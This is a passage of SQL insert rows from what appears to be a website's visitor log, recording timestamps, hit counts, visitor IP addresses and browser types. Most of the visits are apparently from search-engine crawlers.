1501005870,1,1,0,0,'178.154.171.55','other'),(137240,1501005889,1,1,0,0,'178.154.171.18','other'),(137241,1501005910,1,1,0,0,'178.154.171.53','other'),(137242,1501005927,1,1,0,0,'91.209.11.236','other'),(137243,1501005993,1,1,0,0,'37.9.113.94','other'),(137244,1501006348,1,1,0,0,'213.180.203.21','other'),(137245,1501006800,1,1,0,0,'5.45.207.57','other'),(137246,1501006807,2,2,0,0,'178.154.171.59','other'),(137247,1501007156,1,1,0,0,'216.244.66.237','other'),(137248,1501007180,1,1,0,0,'213.180.203.14','other'),(137249,1501007406,1,1,0,0,'37.9.113.128','other'),(137250,1501008188,1,1,0,0,'40.77.167.84','other'),(137251,1501008595,1,1,0,0,'91.209.11.236','other'),(137252,1501008684,1,1,0,0,'216.244.66.194','other'),(137253,1501008934,1,1,0,0,'95.108.181.60','other'),(137254,1501008963,1,0,1,0,'66.249.66.157',''),(137255,1501009186,1,1,0,0,'178.92.251.64','chrome'),(137256,1501009252,1,1,0,0,'77.41.88.121','msie'),(137257,1501009628,1,1,0,0,'91.209.11.236','other'),(137258,1501010194,1,1,0,0,'216.244.66.246','other'),(137259,1501010462,1,1,0,0,'213.180.203.42','other'),(137260,1501010463,1,1,0,0,'37.55.56.152','chrome'),(137261,1501010658,1,1,0,0,'46.161.9.39','firefox'),(137262,1501010756,1,1,0,0,'176.193.9.204','msie'),(137263,1501010758,1,1,0,0,'37.145.10.63','msie'),(137264,1501010763,1,1,0,0,'176.193.17.85','msie'),(137265,1501010764,1,1,0,0,'95.221.235.10','msie'),(137267,1501010765,1,1,0,0,'37.145.114.135','msie'),(137268,1501010767,1,1,0,0,'46.188.29.153','msie'),(137269,1501010771,1,1,0,0,'95.221.61.193','msie'),(137270,1501011089,1,1,0,0,'217.69.133.5','other'),(137271,1501011392,1,1,0,0,'213.180.203.21','other'),(137272,1501012143,1,0,1,0,'66.249.66.76',''),(137273,1501012155,1,0,1,0,'66.249.66.74',''),(137274,1501012242,1,1,0,0,'46.101.172.179','other'),(137275,1501012427,1,1,0,0,'37.9.113.78','other'),(137276,1501012570,1,1,0,0,'78.111.189.96','chrome'),(137277,1501013004,1,1,0,0,'37.9.113.58','other'),(137278,1501014011,1,1,0,0,'8.29.198.27','other'),(137279,1501014187,3,3,0,0,'216.244.66.246','other'),(137280,1501014253,1,1,0,0,'5.45.207.56','other'),(137281,1501014659,1,1,0,0,'121.32.13.228','msie'),(137282,1501015061,3,3,0,0,'216.244.66.194','other'),(137283,1501015387,1,1,0,0,'217.69.133.3','other'),(137284,1501015627,1,1,0,0,'213.180.203.42','other'),(137285,1501016169,1,1,0,0,'5.45.207.57','other'),(137286,1501016223,1,1,0,0,'216.244.66.194','other'),(137287,1501016891,1,1,0,0,'213.180.203.18','other'),(137288,1501017041,2,2,0,0,'91.209.11.236','other'),(137289,1501017563,1,1,0,0,'216.244.66.246','other'),(137290,1501018305,1,1,0,0,'91.209.11.236','other'),(137291,1501019124,1,0,1,0,'66.249.66.156',''),(137292,1501019352,1,1,0,0,'66.249.66.74','chrome'),(137293,1501019437,1,1,0,0,'66.249.76.91','chrome'),(137294,1501019628,1,0,1,0,'66.249.76.93',''),(137295,1501020131,1,1,0,0,'95.108.181.69','other'),(137296,1501020401,1,1,0,0,'178.154.171.42','other'),(137297,1501020989,1,1,0,0,'217.69.133.9','other'),(137298,1501020991,1,1,0,0,'217.69.133.194','other'),(137299,1501021039,1,1,0,0,'66.249.76.89','chrome'),(137300,1501021223,1,1,0,0,'213.180.203.18','other'),(137301,1501021333,7,7,0,0,'216.244.66.246','other'),(137302,1501021336,1,1,0,0,'95.108.181.57','other'),(137303,1501023516,1,1,0,0,'51.255.65.92','other'),(137304,1501023652,1,1,0,0,'176.15.227.107','msie'),(137305,1501023730,1,1,0,0,'51.255.65.74','other'),(137306,1501024227,1,1,0,0,'180.76.15.138','other'),(137307,1501024581,4,4,0,0,'216.244.66.194','other'),(137308,1501024724,1,1,0,0,'213.180.203.14','other'),(137309,1501024857,1,1,0,0,'8.29.198.25','other'),(137310,1501024904,1,1,0,0,'5.45.207.64','other'),(137311,1501024968,2,2,0,0,'216.244.66.246','other'),(137312,1501025343,1,1,0,0,'213.180.203.43','other'),(137313,1501025844,1,1,0,0,'217.182.132.193','other'),(137314,1501026874,1,0,1,0,'66.249.76.107',''),(137315,1501027053,1,1,0,0,'5.45.207.64','other'),(137316,1501027136,3,3,0,0,'216.244.66.194','other'),(137317,1501027901,1,1,0,0,'37.9.113.78','other'),(137318,1501027961,1,1,0,0,'217.69.133.6','other'),(137319,1501028628,1,1,0,0,'217.182.132.24','other'),(137320,1501028725,1,1,0,0,'178.154.171.3','other'),(137321,1501028906,1,1,0,0,'217.69.133.5','other'),(137322,1501029710,1,1,0,0,'213.180.203.18','other'),(137323,1501029889,1,1,0,0,'51.255.65.93','other'),(137324,1501029912,1,1,0,0,'51.255.65.28','other'),(137325,1501030164,1,1,0,0,'51.255.65.14','other'),(137326,1501030564,1,0,1,0,'66.249.76.108',''),(137327,1501030684,1,1,0,0,'217.69.133.215','other'),(137328,1501031055,1,1,0,0,'40.77.167.42','other'),(137329,1501031523,2,2,0,0,'216.244.66.246','other'),(137330,1501032521,1,1,0,0,'217.182.132.58','other'),(137331,1501033084,1,1,0,0,'213.180.203.32','other'),(137332,1501033088,1,0,1,0,'66.249.76.109',''),(137333,1501033146,1,1,0,0,'178.154.171.3','other'),(137334,1501033239,1,1,0,0,'51.255.65.70','other'),(137335,1501033589,1,1,0,0,'217.69.133.194','other'),(137336,1501033591,1,1,0,0,'217.69.133.5','other'),(137337,1501033911,1,1,0,0,'37.9.113.138','other'),(137338,1501034309,1,1,0,0,'151.80.27.118','other'),(137339,1501034396,1,0,1,0,'66.249.66.155',''),(137340,1501034577,1,0,1,0,'66.249.66.156',''),(137341,1501034592,1,1,0,0,'5.45.207.83','other'),(137342,1501034603,1,1,0,0,'51.255.65.24','other'),(137343,1501034879,1,1,0,0,'51.255.71.130','other'),(137344,1501034893,1,1,0,0,'91.209.11.236','other'),(137345,1501035068,1,1,0,0,'37.9.113.94','other'),(137346,1501035143,1,1,0,0,'95.108.181.57','other'),(137347,1501035626,1,1,0,0,'51.255.65.71','other'),(137348,1501035665,1,1,0,0,'137.74.207.110','other'),(137349,1501035699,1,1,0,0,'213.180.203.18','other'),(137350,1501035706,1,1,0,0,'8.29.198.26','other'),(137351,1501035868,6,6,0,0,'216.244.66.194','other'),(137352,1501036071,1,0,1,0,'66.249.76.89',''),(137353,1501036382,1,0,1,0,'66.249.76.108',''),(137354,1501036408,2,2,0,0,'216.244.66.246','other'),(137355,1501036639,1,1,0,0,'217.182.132.193','other'),(137356,1501036760,1,1,0,0,'54.158.25.146','other'),(137357,1501037173,1,1,0,0,'217.182.132.68','other'),(137358,1501037639,1,1,0,0,'217.182.132.73','other'),(137359,1501037708,1,1,0,0,'51.255.65.19','other'),(137360,1501037802,1,1,0,0,'217.182.132.177','other'),(137361,1501037881,1,1,0,0,'217.182.132.174','other'),(137362,1501038012,1,1,0,0,'66.249.76.107','chrome'),(137363,1501038401,1,1,0,0,'178.154.171.59','other'),(137364,1501038470,1,1,0,0,'51.255.65.55','other'),(137365,1501038533,1,1,0,0,'217.182.132.28','other'),(137366,1501038648,1,1,0,0,'217.182.132.52','other'),(137367,1501039053,1,0,1,0,'66.249.76.107',''),(137368,1501039067,1,1,0,0,'176.15.42.236','msie'),(137369,1501039168,1,1,0,0,'95.108.181.58','other'),(137370,1501039199,1,1,0,0,'95.108.181.63','other'),(137371,1501039377,1,1,0,0,'217.182.132.61','other'),(137372,1501039392,1,1,0,0,'217.182.132.154','other'),(137373,1501039418,1,1,0,0,'51.255.65.86','other'),(137374,1501039763,1,1,0,0,'217.182.132.77','other'),(137375,1501039766,1,1,0,0,'217.182.132.193','other'),(137376,1501039888,1,1,0,0,'137.74.207.188','other'),(137377,1501039959,1,1,0,0,'164.132.162.156','other'),(137378,1501040301,1,1,0,0,'217.182.132.184','other'),(137379,1501040673,1,1,0,0,'217.182.132.92','other'),(137380,1501040687,1,1,0,0,'66.249.76.91','chrome'),(137381,1501040761,1,1,0,0,'213.180.203.21','other'),(137382,1501040840,1,1,0,0,'178.154.171.53','other'),(137383,1501041156,1,1,0,0,'51.255.65.13','other'),(137384,1501041785,1,1,0,0,'95.108.181.60','other'),(137385,1501041792,5,5,0,0,'216.244.66.246','other'),(137386,1501041956,1,1,0,0,'217.182.132.14','other'),(137387,1501042613,1,1,0,0,'5.45.207.56','other'),(137388,1501043467,1,1,0,0,'51.255.65.30','other'),(137389,1501043474,1,1,0,0,'51.255.65.41','other'),(137390,1501043493,1,1,0,0,'213.180.203.32','other'),(137391,1501043500,1,1,0,0,'46.211.7.134','other'),(137392,1501043632,1,1,0,0,'217.182.132.182','other'),(137393,1501043891,1,1,0,0,'91.196.178.71','firefox'),(137394,1501043932,1,1,0,0,'95.108.181.63','other'),(137395,1501044040,1,0,1,0,'66.249.66.157',''),(137396,1501044314,1,1,0,0,'137.74.207.161','other'),(137397,1501044530,1,1,0,0,'95.108.181.52','other'),(137398,1501044668,1,1,0,0,'51.255.65.27','other'),(137399,1501044796,1,1,0,0,'51.255.65.64','other'),(137400,1501044847,2,2,0,0,'217.69.133.9','other'),(137401,1501045265,1,1,0,0,'217.182.132.152','other'),(137402,1501045637,1,1,0,0,'5.45.207.64','other'),(137403,1501045808,1,1,0,0,'51.255.65.80','other'),(137404,1501045941,1,1,0,0,'91.196.178.68','chrome'),(137405,1501046073,1,1,0,0,'95.108.181.69','other'),(137406,1501046101,5,5,0,0,'216.244.66.246','other'),(137407,1501046341,1,1,0,0,'95.108.181.60','other'),(137408,1501046549,1,1,0,0,'8.29.198.27','other'),(137409,1501046677,1,1,0,0,'46.201.240.112','firefox'),(137410,1501046697,1,1,0,0,'5.45.207.57','other'),(137411,1501046731,1,1,0,0,'91.209.11.236','other'),(137412,1501046824,1,1,0,0,'164.132.164.180','other'),(137413,1501047011,4,4,0,0,'216.244.66.194','other'),(137414,1501047447,1,1,0,0,'40.77.167.88','other'),(137415,1501047508,1,1,0,0,'5.45.207.56','other'),(137416,1501047612,1,1,0,0,'66.249.76.91','chrome'),(137417,1501048143,1,1,0,0,'66.249.66.156','chrome'),(137418,1501048181,1,1,0,0,'217.182.132.152','other'),(137419,1501048268,1,1,0,0,'95.108.181.60','other'),(137420,1501048299,1,1,0,0,'217.182.132.17','other'),(137421,1501048327,1,1,0,0,'217.182.132.170','other'),(137422,1501048439,1,1,0,0,'95.108.181.58','other'),(137423,1501048516,1,1,0,0,'95.108.181.52','other'),(137424,1501048804,1,1,0,0,'178.154.171.59','other'),(137425,1501048943,1,1,0,0,'37.9.113.94','other'),(137426,1501049001,1,0,1,0,'66.249.66.74',''),(137427,1501049007,1,1,0,0,'66.249.76.108','chrome'),(137428,1501049013,1,1,0,0,'66.249.66.74','chrome'),(137429,1501049116,1,1,0,0,'178.154.171.53','other'),(137430,1501049272,1,1,0,0,'91.209.11.236','other'),(137431,1501049777,1,1,0,0,'217.182.132.32','other'),(137432,1501049839,1,1,0,0,'51.255.71.129','other'),(137433,1501049846,1,1,0,0,'5.45.207.57','other'),(137434,1501049864,1,1,0,0,'40.77.167.88','other'),(137435,1501050329,1,1,0,0,'217.182.132.16','other'),(137436,1501050443,1,1,0,0,'217.69.133.2','other'),(137437,1501050484,1,1,0,0,'51.255.65.47','other'),(137438,1501051068,1,1,0,0,'217.182.132.6','other'),(137439,1501051381,1,1,0,0,'51.255.71.133','other'),(137440,1501051830,1,1,0,0,'178.154.171.53','other'),(137441,1501052143,5,5,0,0,'216.244.66.246','other'),(137442,1501052352,1,1,0,0,'5.45.207.64','other'),(137443,1501052411,2,2,0,0,'91.209.11.236','other'),(137444,1501052948,1,0,1,0,'66.249.76.107',''),(137445,1501053060,1,1,0,0,'213.180.203.14','other'),(137446,1501053088,1,1,0,0,'213.180.203.32','other'),(137447,1501053500,1,1,0,0,'217.182.132.62','other'),(137448,1501053591,1,0,1,0,'66.249.76.108',''),(137449,1501053602,1,1,0,0,'46.219.33.141','chrome'),(137450,1501053697,1,1,0,0,'157.55.39.110','other'),(137451,1501053792,1,1,0,0,'178.154.171.3','other'),(137452,1501054001,1,1,0,0,'217.182.132.172','other'),(137453,1501054198,1,0,1,0,'66.249.76.109',''),(137454,1501055328,1,1,0,0,'66.249.66.157','chrome'),(137455,1501055581,1,1,0,0,'5.45.207.83','other'),(137456,1501055696,5,5,0,0,'216.244.66.194','other'),(137457,1501055716,2,2,0,0,'213.180.203.43','other'),(137458,1501055786,1,1,0,0,'37.9.113.78','other'),(137459,1501056254,1,0,1,0,'66.249.66.156',''),(137460,1501056690,1,1,0,0,'164.132.162.160','other'),(137461,1501057002,1,1,0,0,'194.44.57.169','chrome'),(137462,1501057051,1,1,0,0,'217.182.132.174','other'),(137463,1501057128,1,1,0,0,'46.201.175.91','firefox'),(137464,1501057198,4,4,0,0,'216.244.66.246','other'),(137465,1501057363,1,1,0,0,'51.255.65.12','other'),(137466,1501057387,1,1,0,0,'8.29.198.25','other'),(137467,1501057515,1,1,0,0,'213.180.203.25','other'),(137468,1501057702,1,1,0,0,'51.255.65.92','other'),(137469,1501058089,4,4,0,0,'216.244.66.194','other'),(137470,1501058186,1,1,0,0,'5.45.207.66','other'),(137471,1501058190,2,2,0,0,'178.154.171.59','other'),(137472,1501058783,1,1,0,0,'95.108.181.63','other'),(137473,1501058788,1,1,0,0,'46.164.155.54','chrome'),(137474,1501058817,1,1,0,0,'93.74.212.147','firefox'),(137475,1501058869,1,1,0,0,'137.74.207.110','other'),(137476,1501058961,2,2,0,0,'91.209.51.22','other'),(137477,1501059369,1,1,0,0,'217.182.132.77','other'),(137478,1501059416,1,1,0,0,'51.255.65.90','other'),(137479,1501059422,2,2,0,0,'178.154.171.45','other'),(137480,1501059503,1,1,0,0,'91.196.178.168','chrome'),(137481,1501059859,1,1,0,0,'91.229.121.1','other'),(137482,1501060005,1,1,0,0,'37.9.113.138','other'),(137483,1501060009,1,1,0,0,'178.154.171.42','other'),(137484,1501060085,1,1,0,0,'51.255.65.60','other'),(137485,1501060136,1,1,0,0,'66.249.76.89','chrome'),(137486,1501060169,1,1,0,0,'84.78.21.63','chrome'),(137487,1501060216,1,1,0,0,'51.255.65.63','other'),(137488,1501060252,1,1,0,0,'5.45.207.64','other'),(137489,1501060322,1,1,0,0,'217.69.133.194','other'),(137490,1501060480,1,1,0,0,'213.180.203.21','other'),(137491,1501060594,1,1,0,0,'164.132.162.153','other'),(137492,1501061004,1,1,0,0,'91.196.178.68','chrome'),(137493,1501061405,1,1,0,0,'51.255.65.17','other'),(137494,1501061532,1,1,0,0,'5.45.207.56','other'),(137495,1501061534,1,1,0,0,'84.78.21.63','chrome'),(137496,1501061789,1,1,0,0,'213.180.203.32','other'),(137497,1501061806,1,1,0,0,'66.249.76.91','chrome'),(137498,1501061888,1,1,0,0,'66.102.9.27','chrome'),(137499,1501062196,1,1,0,0,'95.108.181.57','other'),(137500,1501062201,1,1,0,0,'51.255.71.131','other'),(137501,1501062357,1,1,0,0,'213.180.203.43','other'),(137502,1501062375,1,1,0,0,'51.255.65.2','other'),(137503,1501062594,1,1,0,0,'91.196.178.67','chrome'),(137504,1501063034,1,1,0,0,'51.255.65.9','other'),(137505,1501063343,2,2,0,0,'216.244.66.246','other'),(137506,1501063378,1,1,0,0,'137.74.207.188','other'),(137507,1501063773,1,1,0,0,'66.249.76.109','chrome'),(137508,1501063790,1,1,0,0,'164.132.162.158','other'),(137509,1501064047,1,1,0,0,'51.255.71.122','other'),(137510,1501064116,1,1,0,0,'178.154.171.3','other'),(137511,1501064323,1,1,0,0,'5.45.207.83','other'),(137512,1501064476,1,1,0,0,'95.108.181.60','other'),(137513,1501064506,1,1,0,0,'217.182.132.7','other'),(137514,1501064582,1,0,1,0,'66.249.66.195',''),(137515,1501064664,1,1,0,0,'40.77.167.10','other'),(137516,1501064870,1,1,0,0,'51.255.65.90','other'),(137517,1501064872,1,1,0,0,'217.182.132.32','other'),(137518,1501065017,1,1,0,0,'51.255.65.41','other'),(137519,1501066056,1,1,0,0,'77.222.134.101','firefox'),(137520,1501066087,1,1,0,0,'46.164.130.92','firefox'),(137521,1501066136,1,1,0,0,'51.255.71.111','other'),(137522,1501066316,4,4,0,0,'216.244.66.194','other'),(137523,1501066343,1,1,0,0,'51.255.71.123','other'),(137524,1501066644,1,1,0,0,'37.9.113.94','other'),(137525,1501066685,1,1,0,0,'5.45.207.57','other'),(137526,1501066757,1,1,0,0,'178.154.171.18','other'),(137527,1501066828,1,1,0,0,'51.255.65.65','other'),(137528,1501066899,1,1,0,0,'91.196.178.66','firefox'),(137529,1501067282,1,1,0,0,'213.180.203.14','other'),(137530,1501067320,1,1,0,0,'95.108.181.69','other'),(137531,1501067525,1,1,0,0,'217.69.133.4','other'),(137532,1501067592,3,3,0,0,'216.244.66.246','other'),(137533,1501067612,1,1,0,0,'51.255.65.87','other'),(137534,1501067952,1,1,0,0,'51.255.65.88','other'),(137535,1501068235,1,1,0,0,'8.29.198.27','other'),(137536,1501068380,1,1,0,0,'104.45.18.178','other'),(137537,1501068448,1,1,0,0,'94.179.208.232','chrome'),(137538,1501068729,1,1,0,0,'91.142.175.4','chrome'),(137539,1501069043,3,3,0,0,'216.244.66.194','other'),(137540,1501069079,1,1,0,0,'109.237.83.50','firefox'),(137541,1501069187,1,1,0,0,'37.9.113.78','other'),(137542,1501069352,1,1,0,0,'95.108.181.58','other'),(137543,1501069488,1,1,0,0,'217.182.132.75','other'),(137544,1501069779,1,1,0,0,'217.182.132.50','other'),(137545,1501070012,1,1,0,0,'91.196.178.68','firefox'),(137546,1501070089,1,1,0,0,'213.180.203.18','other'),(137547,1501070307,1,1,0,0,'217.182.132.93','other'),(137548,1501070515,1,1,0,0,'94.179.208.232','chrome'),(137549,1501070554,1,1,0,0,'217.182.132.177','other'),(137550,1501070654,1,1,0,0,'51.255.71.129','other'),(137551,1501070999,1,1,0,0,'217.182.132.60','other'),(137552,1501071265,1,0,1,0,'66.249.66.199',''),(137553,1501071404,1,1,0,0,'95.108.181.63','other'),(137554,1501071420,1,0,1,0,'66.249.76.131',''),(137555,1501071434,1,1,0,0,'51.255.65.30','other'),(137556,1501071470,1,1,0,0,'213.180.203.32','other'),(137557,1501071634,1,1,0,0,'37.9.113.78','other'),(137558,1501071702,1,1,0,0,'66.249.76.137','chrome'),(137559,1501072032,1,1,0,0,'46.201.175.91','firefox'),(137560,1501072139,1,1,0,0,'217.182.132.188','other'),(137561,1501072408,1,1,0,0,'213.180.203.42','other'),(137562,1501072426,1,1,0,0,'213.180.203.14','other'),(137563,1501072462,1,0,1,0,'66.249.76.131',''),(137564,1501072812,1,1,0,0,'51.255.65.76','other'),(137565,1501072885,1,1,0,0,'51.255.65.15','other'),(137566,1501073336,1,1,0,0,'94.179.208.232','chrome'),(137567,1501073496,4,4,0,0,'216.244.66.194','other'),(137568,1501073522,1,1,0,0,'91.196.178.129','chrome'),(137569,1501073581,1,1,0,0,'5.45.207.56','other'),(137570,1501073591,1,1,0,0,'95.132.90.89','chrome'),(137571,1501073614,3,3,0,0,'216.244.66.246','other'),(137572,1501073629,1,1,0,0,'66.249.76.91','chrome'),(137573,1501073747,1,1,0,0,'91.196.178.132','firefox'),(137574,1501073925,1,1,0,0,'213.180.203.25','other'),(137575,1501073956,2,2,0,0,'95.158.189.118','other'),(137576,1501074530,1,1,0,0,'213.180.203.21','other'),(137577,1501074869,1,1,0,0,'51.255.71.119','other'),(137578,1501075048,1,1,0,0,'51.255.65.42','other'),(137579,1501075121,1,1,0,0,'95.158.189.118','other'),(137580,1501075229,1,1,0,0,'51.255.65.7','other'),(137581,1501076100,1,1,0,0,'217.182.132.173','other'),(137582,1501076158,1,1,0,0,'217.182.132.84','other'),(137583,1501076189,1,1,0,0,'91.196.177.46','other'),(137584,1501076466,1,1,0,0,'51.255.65.82','other'),(137585,1501077082,1,1,0,0,'51.255.71.128','other'),(137586,1501077149,1,1,0,0,'217.182.132.91','other'),(137587,1501077232,1,0,1,0,'66.249.76.137',''),(137588,1501077523,1,1,0,0,'217.182.132.55','other'),(137589,1501077549,1,0,1,0,'66.249.66.199',''),(137590,1501077741,1,1,0,0,'217.182.132.32','other'),(137591,1501077757,1,1,0,0,'217.182.132.174','other'),(137592,1501077926,1,1,0,0,'5.45.207.56','other'),(137593,1501078011,6,6,0,0,'216.244.66.246','other'),(137594,1501078328,1,1,0,0,'217.182.132.21','other'),(137595,1501079051,1,1,0,0,'5.45.207.56','other'),(137596,1501079064,6,6,0,0,'216.244.66.194','other'),(137597,1501079072,1,1,0,0,'8.29.198.26','other'),(137598,1501079211,2,2,0,0,'37.9.113.138','other'),(137599,1501079528,1,1,0,0,'37.73.254.106','chrome'),(137600,1501079912,1,1,0,0,'213.180.203.43','other'),(137601,1501080239,4,4,0,0,'95.85.56.126','other'),(137602,1501080351,1,1,0,0,'51.255.65.5','other'),(137603,1501080545,1,1,0,0,'176.31.231.10','other'),(137604,1501080623,1,1,0,0,'95.108.181.52','other'),(137605,1501080806,1,0,1,0,'66.249.76.137',''),(137606,1501081004,4,4,0,0,'216.244.66.194','other'),(137607,1501081010,1,1,0,0,'37.9.113.51','other'),(137608,1501081223,1,1,0,0,'95.85.56.126','other'),(137609,1501081301,1,1,0,0,'94.179.208.232','chrome'),(137610,1501081380,1,1,0,0,'51.255.64.106','other'),(137611,1501081595,1,1,0,0,'217.182.132.93','other'),(137612,1501081620,1,1,0,0,'217.182.132.61','other'),(137613,1501082291,1,1,0,0,'94.179.208.232','chrome'),(137614,1501082805,2,0,2,0,'66.249.76.131',''),(137615,1501082984,1,1,0,0,'51.255.65.3','other'),(137616,1501083077,1,1,0,0,'217.182.132.88','other'),(137617,1501083091,1,1,0,0,'217.69.133.5','other'),(137618,1501084072,1,1,0,0,'217.182.132.87','other'),(137619,1501084177,3,3,0,0,'216.244.66.246','other'),(137620,1501084349,1,1,0,0,'217.182.132.72','other'),(137621,1501084594,1,1,0,0,'37.9.113.94','other'),(137622,1501084852,1,1,0,0,'66.249.76.137','chrome'),(137623,1501085109,1,1,0,0,'66.249.76.93','chrome'),(137624,1501085267,1,1,0,0,'213.180.203.32','other'),(137625,1501085648,1,1,0,0,'66.249.76.131','chrome'),(137626,1501085916,1,1,0,0,'5.45.207.56','other'),(137627,1501086408,6,6,0,0,'216.244.66.194','other'),(137628,1501086676,1,1,0,0,'217.182.132.81','other'),(137629,1501086706,1,1,0,0,'217.182.132.191','other'),(137630,1501087155,1,1,0,0,'66.249.76.60','chrome'),(137631,1501087285,1,1,0,0,'128.72.153.64','msie'),(137632,1501087336,1,1,0,0,'51.255.65.86','other'),(137633,1501087654,1,1,0,0,'164.132.162.188','other'),(137634,1501087727,1,1,0,0,'51.255.65.35','other'),(137635,1501087868,1,1,0,0,'217.182.132.94','other'),(137636,1501088797,1,1,0,0,'217.69.133.2','other'),(137637,1501088852,1,1,0,0,'178.154.171.53','other'),(137638,1501089132,1,1,0,0,'217.182.132.7','other'),(137639,1501089247,1,1,0,0,'51.255.71.98','other'),(137640,1501089278,1,1,0,0,'213.180.203.18','other'),(137641,1501089919,1,1,0,0,'8.29.198.26','other'),(137642,1501089990,1,1,0,0,'51.255.65.36','other'),(137643,1501090374,4,4,0,0,'216.244.66.194','other'),(137644,1501090415,4,4,0,0,'216.244.66.246','other'),(137645,1501091016,1,1,0,0,'217.182.132.50','other'),(137646,1501091166,1,1,0,0,'217.182.132.83','other'),(137647,1501091185,1,1,0,0,'51.255.65.88','other'),(137648,1501091222,2,2,0,0,'91.209.11.236','other'),(137649,1501091392,1,1,0,0,'95.108.181.63','other'),(137650,1501091439,1,1,0,0,'51.255.65.53','other'),(137651,1501091673,1,1,0,0,'51.255.65.45','other'),(137652,1501091702,1,1,0,0,'37.9.113.128','other'),(137653,1501092201,1,1,0,0,'51.255.71.131','other'),(137654,1501092722,1,1,0,0,'217.182.132.65','other'),(137655,1501092816,1,1,0,0,'217.182.132.76','other'),(137656,1501093570,1,1,0,0,'66.249.66.155','chrome'),(137657,1501093757,1,1,0,0,'217.182.132.96','other'),(137658,1501093837,1,1,0,0,'217.182.132.152','other'),(137659,1501093946,1,1,0,0,'213.180.203.14','other'),(137660,1501093950,1,1,0,0,'213.180.203.18','other'),(137661,1501094000,1,1,0,0,'213.180.203.25','other'),(137662,1501094123,1,1,0,0,'157.55.39.87','other'),(137663,1501094153,1,1,0,0,'51.255.71.131','other'),(137664,1501094531,1,1,0,0,'217.69.133.3','other'),(137665,1501094542,1,1,0,0,'66.249.76.155','chrome'),(137666,1501094593,1,1,0,0,'51.255.65.59','other'),(137667,1501094770,1,1,0,0,'137.74.207.188','other'),(137668,1501094887,1,1,0,0,'37.9.113.94','other'),(137669,1501095063,5,5,0,0,'216.244.66.246','other'),(137670,1501095087,1,1,0,0,'188.166.79.137','chrome'),(137671,1501095294,1,1,0,0,'51.255.71.126','other'),(137672,1501095600,1,1,0,0,'95.108.181.60','other'),(137673,1501096301,3,3,0,0,'216.244.66.194','other'),(137674,1501096740,1,1,0,0,'51.255.71.133','other'),(137675,1501096856,1,1,0,0,'37.9.113.66','other'),(137676,1501097132,1,1,0,0,'95.108.181.58','other'),(137677,1501097418,1,0,1,0,'66.249.66.156',''),(137678,1501097467,1,1,0,0,'217.182.132.16','other'),(137679,1501097818,1,1,0,0,'95.108.181.57','other'),(137680,1501098236,1,1,0,0,'217.182.132.187','other'),(137681,1501098244,1,1,0,0,'180.76.15.28','other'),(137682,1501098310,1,1,0,0,'178.154.171.59','other'),(137683,1501098659,1,1,0,0,'217.182.132.92','other'),(137684,1501098861,1,1,0,0,'213.180.203.42','other'),(137685,1501099147,1,1,0,0,'217.182.132.73','other'),(137686,1501099402,1,1,0,0,'95.108.181.63','other'),(137687,1501099555,1,1,0,0,'91.209.11.236','other'),(137688,1501099725,1,1,0,0,'217.182.132.82','other'),(137689,1501099830,1,1,0,0,'213.180.203.14','other'),(137690,1501100020,1,1,0,0,'217.182.132.240','other'),(137691,1501100673,1,1,0,0,'51.255.65.48','other'),(137692,1501100753,1,1,0,0,'217.182.132.50','other'),(137693,1501100755,1,1,0,0,'8.29.198.25','other'),(137694,1501100792,1,1,0,0,'51.255.65.91','other'),(137695,1501100884,1,1,0,0,'51.255.65.63','other'),(137696,1501100936,1,1,0,0,'66.249.66.75','chrome'),(137697,1501101329,1,1,0,0,'51.255.65.69','other'),(137698,1501101358,4,4,0,0,'216.244.66.194','other'),(137699,1501101687,1,1,0,0,'217.182.132.77','other'),(137700,1501101839,2,2,0,0,'216.244.66.246','other'),(137701,1501102003,1,1,0,0,'91.209.11.236','other'),(137702,1501102233,1,0,1,0,'66.249.76.47',''),(137703,1501102249,1,1,0,0,'37.9.113.66','other'),(137704,1501102252,1,1,0,0,'213.180.203.18','other'),(137705,1501102280,1,1,0,0,'217.182.132.28','other'),(137706,1501102435,1,1,0,0,'137.74.207.161','other'),(137707,1501102458,1,0,1,0,'66.249.76.137',''),(137708,1501102544,1,1,0,0,'5.45.207.83','other'),(137709,1501102753,1,1,0,0,'217.182.132.55','other'),(137710,1501102876,1,1,0,0,'178.154.171.3','other'),(137711,1501102990,1,1,0,0,'213.180.203.32','other'),(137712,1501103015,1,1,0,0,'51.255.65.95','other'),(137713,1501103803,3,3,0,0,'216.244.66.194','other'),(137714,1501104167,1,1,0,0,'95.108.181.52','other'),(137715,1501104381,1,1,0,0,'46.118.156.191','firefox'),(137716,1501104549,1,1,0,0,'51.255.65.76','other'),(137717,1501104707,2,2,0,0,'213.180.203.14','other'),(137718,1501105075,1,1,0,0,'217.182.132.151','other'),(137719,1501105242,1,1,0,0,'51.255.65.58','other'),(137720,1501105381,4,4,0,0,'216.244.66.246','other'),(137721,1501105626,1,1,0,0,'51.255.71.116','other'),(137722,1501105938,1,1,0,0,'91.209.11.236','other'),(137723,1501105983,1,1,0,0,'217.182.132.83','other'),(137724,1501106230,1,1,0,0,'95.24.204.67','chrome'),(137725,1501106877,1,1,0,0,'213.180.203.42','other'),(137726,1501107172,1,1,0,0,'66.249.76.89','chrome'),(137727,1501107274,1,1,0,0,'216.244.66.237','other'),(137728,1501107278,1,1,0,0,'157.55.39.87','other'),(137729,1501107305,1,1,0,0,'213.180.203.14','other'),(137730,1501107424,1,1,0,0,'51.255.65.17','other'),(137731,1501107661,1,1,0,0,'213.180.203.32','other'),(137732,1501107869,1,1,0,0,'217.182.132.183','other'),(137733,1501108083,1,1,0,0,'95.108.181.69','other'),(137734,1501108451,1,1,0,0,'213.180.203.42','other'),(137735,1501108953,1,1,0,0,'217.182.132.178','other'),(137736,1501109301,1,1,0,0,'51.255.65.59','other'),(137737,1501109373,1,0,1,0,'66.249.76.93',''),(137738,1501109428,1,1,0,0,'178.154.171.18','other'),(137739,1501109451,1,1,0,0,'51.255.71.133','other'),(137740,1501110372,2,2,0,0,'178.154.171.3','other'),(137741,1501110923,5,5,0,0,'216.244.66.246','other'),(137742,1501111305,1,1,0,0,'51.255.65.26','other'),(137743,1501111520,3,3,0,0,'216.244.66.194','other'),(137744,1501111593,1,1,0,0,'8.29.198.25','other'),(137745,1501111623,1,1,0,0,'51.255.65.41','other'),(137746,1501111830,1,1,0,0,'51.255.65.63','other'),(137747,1501111970,1,1,0,0,'217.182.132.19','other'),(137748,1501112122,1,1,0,0,'217.182.132.86','other'),(137749,1501112319,1,1,0,0,'216.244.66.246','other'),(137750,1501112715,1,1,0,0,'95.108.181.63','other'),(137751,1501113132,1,1,0,0,'37.10.153.178','chrome'),(137752,1501113738,5,5,0,0,'216.244.66.194','other'),(137753,1501113894,1,1,0,0,'91.209.11.